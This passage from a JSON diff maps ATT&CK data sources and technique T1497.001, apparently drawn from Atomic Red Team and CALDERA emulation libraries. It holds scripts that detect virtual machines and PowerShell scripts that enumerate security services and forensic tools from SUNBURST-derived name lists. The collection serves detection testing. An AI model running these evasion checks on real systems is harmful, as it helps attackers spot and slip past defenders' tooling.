+ "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "transport layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "application layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "network traffic volume" + }, + { + "data_source": "sensor health", + "definition": "Information associated with sensors providing data about host system status.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "host status", + "description": "Data from a sensor about the health of a host system sensor", + "source_data_element": "sensor health", + "relationship": "contained", + "target_data_element": "host system status" + } + ], + "external_reference": [ + "https://securelist.com/lazarus-under-the-hood/77908/", + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ], + null + ] + }, + { + "technique_id": "T1497.001", + "command_list": [ + "if (systemd-detect-virt || sudo dmidecode | egrep -i 'manufacturer|product|vendor' | grep -iE 'Oracle|VirtualBox|VMWare|Parallels') then echo \"Virtualization Environment detected\"; fi;\n", + "$error.clear()\nGet-WmiObject -Query \"SELECT * FROM MSAcpi_ThermalZoneTemperature\" -ErrorAction SilentlyContinue\nif($error) {echo \"Virtualization 
Environment detected\"}\n", + "if (ioreg -l | grep -e Manufacturer -e 'Vendor Name' | grep -iE 'Oracle|VirtualBox|VMWare|Parallels') then echo 'Virtualization Environment detected'; fi;\n", + "$Manufacturer = Get-WmiObject -Class Win32_ComputerSystem | select-object -expandproperty \"Manufacturer\"\n$Model = Get-WmiObject -Class Win32_ComputerSystem | select-object -expandproperty \"Model\"\nif((($Manufacturer.ToLower() -eq \"microsoft corporation\") -and ($Model.ToLower().contains(\"virtual\"))) -or ($Manufacturer.ToLower().contains(\"vmware\")) -or ($Model.ToLower() -eq \"virtualbox\")) {write-host \"Virtualization environment detected!\"} else {write-host \"No virtualization environment detected!\"}\n", + "$securityServices = @(\n \"msmpeng\",\n \"windefend\",\n \"mssense\",\n \"sense\",\n \"microsoft.tri.sensor\",\n \"microsoft.tri.sensor.updater\",\n \"cavp\",\n \"cb\",\n \"carbonblack\",\n \"carbonblackk\",\n \"cbcomms\",\n \"cbstream\",\n \"csfalconservice\",\n \"csfalconcontainer\",\n \"csagent\",\n \"csdevicecontrol\",\n \"csfalconservice\",\n \"xagt\",\n \"xagtnotif\",\n \"fe_avk\",\n \"fekern\",\n \"feelam\",\n \"fewscservice\",\n \"ekrn\",\n \"eguiproxy\",\n \"egui\",\n \"eamonm\",\n \"eelam\",\n \"ehdrv\",\n \"ekrnepfw\",\n \"epfwwfp\",\n \"ekbdflt\",\n \"epfw\",\n \"fsgk32st\",\n \"fswebuid\",\n \"fsgk32\",\n \"fsma32\",\n \"fssm32\",\n \"fnrb32\",\n \"fsaua\",\n \"fsorsp\",\n \"fsav32\",\n \"f-secure gatekeeper handler starter\",\n \"f-secure network request broker\",\n \"f-secure webui daemon\",\n \"fsma\",\n \"fsorspclient\",\n \"f-secure gatekeeper\",\n \"f-secure hips\",\n \"fsbts\",\n \"fsni\",\n \"fsvista\",\n \"f-secure filter\",\n \"f-secure recognizer\",\n \"fses\",\n \"fsfw\",\n \"fsdfw\",\n \"fsms\",\n \"fsdevcon\"\n);\n\n$currentServices = Get-Service | Select-Object -Property Name;\nforeach ($svc in $currentServices) {\n foreach ($secSvc in $securityServices) {\n if ($svc.Name -like $secSvc) {\n $svcDetails = Get-Service -name $svc.Name 
| Select-Object -Property Name, DisplayName, Status;\n Write-Host \"[!] Security service found:\";\n Write-Host \" Service Name:`t\", $svcDetails.Name;\n Write-Host \" Display Name:`t\", $svcDetails.DisplayName;\n Write-Host \" Status:`t`t\", $svcDetails.Status;\n Write-Host \"\";\n }\n }\n}\n", + "$forensicProcesses = @(\n \"apimonitor-x64\",\n \"apimonitor-x86\",\n \"autopsy64\",\n \"autopsy\",\n \"autoruns64\",\n \"autoruns\",\n \"autorunsc64\",\n \"autorunsc\",\n \"binaryninja\",\n \"blacklight\",\n \"cff explorer\",\n \"cutter\",\n \"de4dot\",\n \"debugview\",\n \"diskmon\",\n \"dnsd\",\n \"dnspy\",\n \"dotpeek32\",\n \"dotpeek64\",\n \"dumpcap\",\n \"evidence center\",\n \"exeinfope\",\n \"fakedns\",\n \"fakenet\",\n \"ffdec\",\n \"fiddler\",\n \"fileinsight\",\n \"floss\",\n \"gdb\",\n \"hiew32demo\",\n \"hiew32\",\n \"hollows_hunter\",\n \"idaq64\",\n \"idaq\",\n \"idr\",\n \"ildasm\",\n \"ilspy\",\n \"jd-gui\",\n \"lordpe\",\n \"officemalscanner\",\n \"ollydbg\",\n \"pdfstreamdumper\",\n \"pe-bear\",\n \"pebrowse64\",\n \"peid\",\n \"pe-sieve32\",\n \"pe-sieve64\",\n \"pestudio\",\n \"peview\",\n \"ppee\",\n \"procdump64\",\n \"procdump\",\n \"processhacker\",\n \"procexp64\",\n \"procexp\",\n \"procmon\",\n \"prodiscoverbasic\",\n \"py2exedecompiler\",\n \"r2agent\",\n \"rabin2\",\n \"radare2\",\n \"ramcapture64\",\n \"ramcapture\",\n \"reflector\",\n \"regmon\",\n \"resourcehacker\",\n \"retdec-ar-extractor\",\n \"retdec-bin2llvmir\",\n \"retdec-bin2pat\",\n \"retdec-config\",\n \"retdec-fileinfo\",\n \"retdec-getsig\",\n \"retdec-idr2pat\",\n \"retdec-llvmir2hll\",\n \"retdec-macho-extractor\",\n \"retdec-pat2yara\",\n \"retdec-stacofin\",\n \"retdec-unpacker\",\n \"retdec-yarac\",\n \"rundotnetdll\",\n \"sbiesvc\",\n \"scdbg\",\n \"scylla_x64\",\n \"scylla_x86\",\n \"shellcode_launcher\",\n \"solarwindsdiagnostics\",\n \"sysmon64\",\n \"sysmon\",\n \"task explorer\",\n \"task explorer-x64\",\n \"tcpdump\",\n \"tcpvcon\",\n \"tcpview\",\n 
\"vboxservice\",\n \"win32_remote\",\n \"win64_remotex64\",\n \"windbg\",\n \"windump\",\n \"winhex64\",\n \"winhex\",\n \"winobj\",\n \"wireshark\",\n \"x32dbg\",\n \"x64dbg\",\n \"xwforensics64\",\n \"xwforensics\",\n \"redcloak\",\n \"avgsvc\",\n \"avgui\",\n \"avgsvca\",\n \"avgidsagent\",\n \"avgsvcx\",\n \"avgwdsvcx\",\n \"avgadminclientservice\",\n \"afwserv\",\n \"avastui\",\n \"avastsvc\",\n \"aswidsagent\",\n \"aswidsagenta\",\n \"aswengsrv\",\n \"avastavwrapper\",\n \"bccavsvc\",\n \"psanhost\",\n \"psuaservice\",\n \"psuamain\",\n \"avp\",\n \"avpui\",\n \"ksde\",\n \"ksdeui\",\n \"tanium\",\n \"taniumclient\",\n \"taniumdetectengine\",\n \"taniumendpointindex\",\n \"taniumtracecli\",\n \"taniumtracewebsocketclient64\"\n);\n\nfunction Find-ForensicProcesses {\n param (\n $ForensicProcessList\n );\n $CurrentProcesses = Get-Process | Sort-Object | Select-Object -Property Name | Get-Unique -AsString;\n foreach ($proc in $CurrentProcesses) {\n foreach ($forensicProc in $ForensicProcessList) {\n if ($proc.name -like $forensicProc) {\n $procPath = Get-Process -Name $proc.Name | Sort-Object | Select-Object -Property Path | Get-Unique;\n Write-Host \"[!] Forensic process found: \" $proc.Name;\n Write-Host \"[!] 
Path: \" $procPath.Path;\n }\n }\n }\n}\n\nFind-ForensicProcesses($forensicProcesses);", + "get-wmiobject win32_computersystem | fl model\n" + ], + "commands": [ + { + "command": "if (systemd-detect-virt || sudo dmidecode | egrep -i 'manufacturer|product|vendor' | grep -iE 'Oracle|VirtualBox|VMWare|Parallels') then echo \"Virtualization Environment detected\"; fi;\n", + "source": "atomics/T1497.001/T1497.001.yaml", + "name": "Atomic Red Team Test - Virtualization/Sandbox Evasion: System Checks" + }, + { + "command": "$error.clear()\nGet-WmiObject -Query \"SELECT * FROM MSAcpi_ThermalZoneTemperature\" -ErrorAction SilentlyContinue\nif($error) {echo \"Virtualization Environment detected\"}\n", + "source": "atomics/T1497.001/T1497.001.yaml", + "name": "Atomic Red Team Test - Virtualization/Sandbox Evasion: System Checks" + }, + { + "command": "if (ioreg -l | grep -e Manufacturer -e 'Vendor Name' | grep -iE 'Oracle|VirtualBox|VMWare|Parallels') then echo 'Virtualization Environment detected'; fi;\n", + "source": "atomics/T1497.001/T1497.001.yaml", + "name": "Atomic Red Team Test - Virtualization/Sandbox Evasion: System Checks" + }, + { + "command": "$Manufacturer = Get-WmiObject -Class Win32_ComputerSystem | select-object -expandproperty \"Manufacturer\"\n$Model = Get-WmiObject -Class Win32_ComputerSystem | select-object -expandproperty \"Model\"\nif((($Manufacturer.ToLower() -eq \"microsoft corporation\") -and ($Model.ToLower().contains(\"virtual\"))) -or ($Manufacturer.ToLower().contains(\"vmware\")) -or ($Model.ToLower() -eq \"virtualbox\")) {write-host \"Virtualization environment detected!\"} else {write-host \"No virtualization environment detected!\"}\n", + "source": "atomics/T1497.001/T1497.001.yaml", + "name": "Atomic Red Team Test - Virtualization/Sandbox Evasion: System Checks" + }, + { + "command": "$securityServices = @(\n \"msmpeng\",\n \"windefend\",\n \"mssense\",\n \"sense\",\n \"microsoft.tri.sensor\",\n \"microsoft.tri.sensor.updater\",\n \"cavp\",\n 
\"cb\",\n \"carbonblack\",\n \"carbonblackk\",\n \"cbcomms\",\n \"cbstream\",\n \"csfalconservice\",\n \"csfalconcontainer\",\n \"csagent\",\n \"csdevicecontrol\",\n \"csfalconservice\",\n \"xagt\",\n \"xagtnotif\",\n \"fe_avk\",\n \"fekern\",\n \"feelam\",\n \"fewscservice\",\n \"ekrn\",\n \"eguiproxy\",\n \"egui\",\n \"eamonm\",\n \"eelam\",\n \"ehdrv\",\n \"ekrnepfw\",\n \"epfwwfp\",\n \"ekbdflt\",\n \"epfw\",\n \"fsgk32st\",\n \"fswebuid\",\n \"fsgk32\",\n \"fsma32\",\n \"fssm32\",\n \"fnrb32\",\n \"fsaua\",\n \"fsorsp\",\n \"fsav32\",\n \"f-secure gatekeeper handler starter\",\n \"f-secure network request broker\",\n \"f-secure webui daemon\",\n \"fsma\",\n \"fsorspclient\",\n \"f-secure gatekeeper\",\n \"f-secure hips\",\n \"fsbts\",\n \"fsni\",\n \"fsvista\",\n \"f-secure filter\",\n \"f-secure recognizer\",\n \"fses\",\n \"fsfw\",\n \"fsdfw\",\n \"fsms\",\n \"fsdevcon\"\n);\n\n$currentServices = Get-Service | Select-Object -Property Name;\nforeach ($svc in $currentServices) {\n foreach ($secSvc in $securityServices) {\n if ($svc.Name -like $secSvc) {\n $svcDetails = Get-Service -name $svc.Name | Select-Object -Property Name, DisplayName, Status;\n Write-Host \"[!] Security service found:\";\n Write-Host \" Service Name:`t\", $svcDetails.Name;\n Write-Host \" Display Name:`t\", $svcDetails.DisplayName;\n Write-Host \" Status:`t`t\", $svcDetails.Status;\n Write-Host \"\";\n }\n }\n}\n", + "source": "data/abilities/defense-evasion/1258b063-27d6-489b-a677-4807faacf868.yml", + "name": "Check for security services. Security service list is based on the SUNBURST malware observed in a Solarwinds related compromise (https://research.checkpoint.com/2020/sunburst-teardrop-and-the-netsec-new-normal/)." 
+ }, + { + "command": "$forensicProcesses = @(\n \"apimonitor-x64\",\n \"apimonitor-x86\",\n \"autopsy64\",\n \"autopsy\",\n \"autoruns64\",\n \"autoruns\",\n \"autorunsc64\",\n \"autorunsc\",\n \"binaryninja\",\n \"blacklight\",\n \"cff explorer\",\n \"cutter\",\n \"de4dot\",\n \"debugview\",\n \"diskmon\",\n \"dnsd\",\n \"dnspy\",\n \"dotpeek32\",\n \"dotpeek64\",\n \"dumpcap\",\n \"evidence center\",\n \"exeinfope\",\n \"fakedns\",\n \"fakenet\",\n \"ffdec\",\n \"fiddler\",\n \"fileinsight\",\n \"floss\",\n \"gdb\",\n \"hiew32demo\",\n \"hiew32\",\n \"hollows_hunter\",\n \"idaq64\",\n \"idaq\",\n \"idr\",\n \"ildasm\",\n \"ilspy\",\n \"jd-gui\",\n \"lordpe\",\n \"officemalscanner\",\n \"ollydbg\",\n \"pdfstreamdumper\",\n \"pe-bear\",\n \"pebrowse64\",\n \"peid\",\n \"pe-sieve32\",\n \"pe-sieve64\",\n \"pestudio\",\n \"peview\",\n \"ppee\",\n \"procdump64\",\n \"procdump\",\n \"processhacker\",\n \"procexp64\",\n \"procexp\",\n \"procmon\",\n \"prodiscoverbasic\",\n \"py2exedecompiler\",\n \"r2agent\",\n \"rabin2\",\n \"radare2\",\n \"ramcapture64\",\n \"ramcapture\",\n \"reflector\",\n \"regmon\",\n \"resourcehacker\",\n \"retdec-ar-extractor\",\n \"retdec-bin2llvmir\",\n \"retdec-bin2pat\",\n \"retdec-config\",\n \"retdec-fileinfo\",\n \"retdec-getsig\",\n \"retdec-idr2pat\",\n \"retdec-llvmir2hll\",\n \"retdec-macho-extractor\",\n \"retdec-pat2yara\",\n \"retdec-stacofin\",\n \"retdec-unpacker\",\n \"retdec-yarac\",\n \"rundotnetdll\",\n \"sbiesvc\",\n \"scdbg\",\n \"scylla_x64\",\n \"scylla_x86\",\n \"shellcode_launcher\",\n \"solarwindsdiagnostics\",\n \"sysmon64\",\n \"sysmon\",\n \"task explorer\",\n \"task explorer-x64\",\n \"tcpdump\",\n \"tcpvcon\",\n \"tcpview\",\n \"vboxservice\",\n \"win32_remote\",\n \"win64_remotex64\",\n \"windbg\",\n \"windump\",\n \"winhex64\",\n \"winhex\",\n \"winobj\",\n \"wireshark\",\n \"x32dbg\",\n \"x64dbg\",\n \"xwforensics64\",\n \"xwforensics\",\n \"redcloak\",\n \"avgsvc\",\n \"avgui\",\n \"avgsvca\",\n 
\"avgidsagent\",\n \"avgsvcx\",\n \"avgwdsvcx\",\n \"avgadminclientservice\",\n \"afwserv\",\n \"avastui\",\n \"avastsvc\",\n \"aswidsagent\",\n \"aswidsagenta\",\n \"aswengsrv\",\n \"avastavwrapper\",\n \"bccavsvc\",\n \"psanhost\",\n \"psuaservice\",\n \"psuamain\",\n \"avp\",\n \"avpui\",\n \"ksde\",\n \"ksdeui\",\n \"tanium\",\n \"taniumclient\",\n \"taniumdetectengine\",\n \"taniumendpointindex\",\n \"taniumtracecli\",\n \"taniumtracewebsocketclient64\"\n);\n\nfunction Find-ForensicProcesses {\n param (\n $ForensicProcessList\n );\n $CurrentProcesses = Get-Process | Sort-Object | Select-Object -Property Name | Get-Unique -AsString;\n foreach ($proc in $CurrentProcesses) {\n foreach ($forensicProc in $ForensicProcessList) {\n if ($proc.name -like $forensicProc) {\n $procPath = Get-Process -Name $proc.Name | Sort-Object | Select-Object -Property Path | Get-Unique;\n Write-Host \"[!] Forensic process found: \" $proc.Name;\n Write-Host \"[!] Path: \" $procPath.Path;\n }\n }\n }\n}\n\nFind-ForensicProcesses($forensicProcesses);", + "source": "data/abilities/defense-evasion/7a6ba833-de40-466a-8969-5c37b13603e0.yml", + "name": "Check for analysis/sandbox environment processes. Process black list is based on the SUNBURST malware observed in a Solarwinds related compromise (https://research.checkpoint.com/2020/sunburst-teardrop-and-the-netsec-new-normal/)." 
+ }, + { + "command": "get-wmiobject win32_computersystem | fl model\n", + "source": "data/abilities/discovery/5dc841fd-28ad-40e2-b10e-fb007fe09e81.yml", + "name": "Determine if the system is virtualized or physical" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1497.001", + "display_name": "Virtualization/Sandbox Evasion: System Checks", + "atomic_tests": [ + { + "name": "Detect Virtualization Environment (Linux)", + "auto_generated_guid": "dfbd1a21-540d-4574-9731-e852bd6fe840", + "description": "systemd-detect-virt detects execution in a virtualized environment.\nAt boot, dmesg stores a log if a hypervisor is detected.\n", + "supported_platforms": [ + "linux" + ], + "executor": { + "name": "sh", + "elevation_required": true, + "command": "if (systemd-detect-virt || sudo dmidecode | egrep -i 'manufacturer|product|vendor' | grep -iE 'Oracle|VirtualBox|VMWare|Parallels') then echo \"Virtualization Environment detected\"; fi;\n" + } + }, + { + "name": "Detect Virtualization Environment (Windows)", + "auto_generated_guid": "502a7dc4-9d6f-4d28-abf2-f0e84692562d", + "description": "Windows Management Instrumentation(WMI) objects contains system information which helps to detect virtualization. This command will specifically attempt to get the CurrentTemperature value from this object and will check to see if the attempt results in an error that contains the word supported. 
This is meant to find the result of Not supported, which is the result if run in a virtual machine\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "name": "powershell", + "elevation_required": false, + "command": "$error.clear()\nGet-WmiObject -Query \"SELECT * FROM MSAcpi_ThermalZoneTemperature\" -ErrorAction SilentlyContinue\nif($error) {echo \"Virtualization Environment detected\"}\n", + "cleanup_command": "$error.clear()\n" + } + }, + { + "name": "Detect Virtualization Environment (MacOS)", + "auto_generated_guid": "a960185f-aef6-4547-8350-d1ce16680d09", + "description": "ioreg contains registry entries for all the device drivers in the system. If it's a virtual machine, one of the device manufacturer will be a Virtualization Software.\n", + "supported_platforms": [ + "macos" + ], + "executor": { + "name": "sh", + "elevation_required": false, + "command": "if (ioreg -l | grep -e Manufacturer -e 'Vendor Name' | grep -iE 'Oracle|VirtualBox|VMWare|Parallels') then echo 'Virtualization Environment detected'; fi;\n" + } + }, + { + "name": "Detect Virtualization Environment via WMI Manufacturer/Model Listing (Windows)", + "auto_generated_guid": "4a41089a-48e0-47aa-82cb-5b81a463bc78", + "description": "Windows Management Instrumentation(WMI) objects contain system information which helps to detect virtualization. This test will get the model and manufacturer of the machine to determine if it is a virtual machine, such as through VMware or VirtualBox. 
\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "name": "powershell", + "elevation_required": false, + "command": "$Manufacturer = Get-WmiObject -Class Win32_ComputerSystem | select-object -expandproperty \"Manufacturer\"\n$Model = Get-WmiObject -Class Win32_ComputerSystem | select-object -expandproperty \"Model\"\nif((($Manufacturer.ToLower() -eq \"microsoft corporation\") -and ($Model.ToLower().contains(\"virtual\"))) -or ($Manufacturer.ToLower().contains(\"vmware\")) -or ($Model.ToLower() -eq \"virtualbox\")) {write-host \"Virtualization environment detected!\"} else {write-host \"No virtualization environment detected!\"}\n" + } + } + ] + }, + { + "id": "1258b063-27d6-489b-a677-4807faacf868", + "name": "Check Security Services", + "description": "Check for security services. Security service list is based on the SUNBURST malware observed in a Solarwinds related compromise (https://research.checkpoint.com/2020/sunburst-teardrop-and-the-netsec-new-normal/).", + "tactic": "defense-evasion", + "technique": { + "attack_id": "T1497.001", + "name": "Virtualization/Sandbox Evasion: System Checks" + }, + "platforms": { + "windows": { + "psh,pwsh": { + "command": "$securityServices = @(\n \"msmpeng\",\n \"windefend\",\n \"mssense\",\n \"sense\",\n \"microsoft.tri.sensor\",\n \"microsoft.tri.sensor.updater\",\n \"cavp\",\n \"cb\",\n \"carbonblack\",\n \"carbonblackk\",\n \"cbcomms\",\n \"cbstream\",\n \"csfalconservice\",\n \"csfalconcontainer\",\n \"csagent\",\n \"csdevicecontrol\",\n \"csfalconservice\",\n \"xagt\",\n \"xagtnotif\",\n \"fe_avk\",\n \"fekern\",\n \"feelam\",\n \"fewscservice\",\n \"ekrn\",\n \"eguiproxy\",\n \"egui\",\n \"eamonm\",\n \"eelam\",\n \"ehdrv\",\n \"ekrnepfw\",\n \"epfwwfp\",\n \"ekbdflt\",\n \"epfw\",\n \"fsgk32st\",\n \"fswebuid\",\n \"fsgk32\",\n \"fsma32\",\n \"fssm32\",\n \"fnrb32\",\n \"fsaua\",\n \"fsorsp\",\n \"fsav32\",\n \"f-secure gatekeeper handler starter\",\n \"f-secure network request broker\",\n \"f-secure 
webui daemon\",\n \"fsma\",\n \"fsorspclient\",\n \"f-secure gatekeeper\",\n \"f-secure hips\",\n \"fsbts\",\n \"fsni\",\n \"fsvista\",\n \"f-secure filter\",\n \"f-secure recognizer\",\n \"fses\",\n \"fsfw\",\n \"fsdfw\",\n \"fsms\",\n \"fsdevcon\"\n);\n\n$currentServices = Get-Service | Select-Object -Property Name;\nforeach ($svc in $currentServices) {\n foreach ($secSvc in $securityServices) {\n if ($svc.Name -like $secSvc) {\n $svcDetails = Get-Service -name $svc.Name | Select-Object -Property Name, DisplayName, Status;\n Write-Host \"[!] Security service found:\";\n Write-Host \" Service Name:`t\", $svcDetails.Name;\n Write-Host \" Display Name:`t\", $svcDetails.DisplayName;\n Write-Host \" Status:`t`t\", $svcDetails.Status;\n Write-Host \"\";\n }\n }\n}\n" + } + } + } + }, + { + "id": "7a6ba833-de40-466a-8969-5c37b13603e0", + "name": "Check analysis environment processes", + "description": "Check for analysis/sandbox environment processes. Process black list is based on the SUNBURST malware observed in a Solarwinds related compromise (https://research.checkpoint.com/2020/sunburst-teardrop-and-the-netsec-new-normal/).", + "tactic": "defense-evasion", + "technique": { + "attack_id": "T1497.001", + "name": "Virtualization/Sandbox Evasion: System Checks" + }, + "platforms": { + "windows": { + "psh": { + "command": "$forensicProcesses = @(\n \"apimonitor-x64\",\n \"apimonitor-x86\",\n \"autopsy64\",\n \"autopsy\",\n \"autoruns64\",\n \"autoruns\",\n \"autorunsc64\",\n \"autorunsc\",\n \"binaryninja\",\n \"blacklight\",\n \"cff explorer\",\n \"cutter\",\n \"de4dot\",\n \"debugview\",\n \"diskmon\",\n \"dnsd\",\n \"dnspy\",\n \"dotpeek32\",\n \"dotpeek64\",\n \"dumpcap\",\n \"evidence center\",\n \"exeinfope\",\n \"fakedns\",\n \"fakenet\",\n \"ffdec\",\n \"fiddler\",\n \"fileinsight\",\n \"floss\",\n \"gdb\",\n \"hiew32demo\",\n \"hiew32\",\n \"hollows_hunter\",\n \"idaq64\",\n \"idaq\",\n \"idr\",\n \"ildasm\",\n \"ilspy\",\n \"jd-gui\",\n \"lordpe\",\n 
\"officemalscanner\",\n \"ollydbg\",\n \"pdfstreamdumper\",\n \"pe-bear\",\n \"pebrowse64\",\n \"peid\",\n \"pe-sieve32\",\n \"pe-sieve64\",\n \"pestudio\",\n \"peview\",\n \"ppee\",\n \"procdump64\",\n \"procdump\",\n \"processhacker\",\n \"procexp64\",\n \"procexp\",\n \"procmon\",\n \"prodiscoverbasic\",\n \"py2exedecompiler\",\n \"r2agent\",\n \"rabin2\",\n \"radare2\",\n \"ramcapture64\",\n \"ramcapture\",\n \"reflector\",\n \"regmon\",\n \"resourcehacker\",\n \"retdec-ar-extractor\",\n \"retdec-bin2llvmir\",\n \"retdec-bin2pat\",\n \"retdec-config\",\n \"retdec-fileinfo\",\n \"retdec-getsig\",\n \"retdec-idr2pat\",\n \"retdec-llvmir2hll\",\n \"retdec-macho-extractor\",\n \"retdec-pat2yara\",\n \"retdec-stacofin\",\n \"retdec-unpacker\",\n \"retdec-yarac\",\n \"rundotnetdll\",\n \"sbiesvc\",\n \"scdbg\",\n \"scylla_x64\",\n \"scylla_x86\",\n \"shellcode_launcher\",\n \"solarwindsdiagnostics\",\n \"sysmon64\",\n \"sysmon\",\n \"task explorer\",\n \"task explorer-x64\",\n \"tcpdump\",\n \"tcpvcon\",\n \"tcpview\",\n \"vboxservice\",\n \"win32_remote\",\n \"win64_remotex64\",\n \"windbg\",\n \"windump\",\n \"winhex64\",\n \"winhex\",\n \"winobj\",\n \"wireshark\",\n \"x32dbg\",\n \"x64dbg\",\n \"xwforensics64\",\n \"xwforensics\",\n \"redcloak\",\n \"avgsvc\",\n \"avgui\",\n \"avgsvca\",\n \"avgidsagent\",\n \"avgsvcx\",\n \"avgwdsvcx\",\n \"avgadminclientservice\",\n \"afwserv\",\n \"avastui\",\n \"avastsvc\",\n \"aswidsagent\",\n \"aswidsagenta\",\n \"aswengsrv\",\n \"avastavwrapper\",\n \"bccavsvc\",\n \"psanhost\",\n \"psuaservice\",\n \"psuamain\",\n \"avp\",\n \"avpui\",\n \"ksde\",\n \"ksdeui\",\n \"tanium\",\n \"taniumclient\",\n \"taniumdetectengine\",\n \"taniumendpointindex\",\n \"taniumtracecli\",\n \"taniumtracewebsocketclient64\"\n);\n\nfunction Find-ForensicProcesses {\n param (\n $ForensicProcessList\n );\n $CurrentProcesses = Get-Process | Sort-Object | Select-Object -Property Name | Get-Unique -AsString;\n foreach ($proc in $CurrentProcesses) 
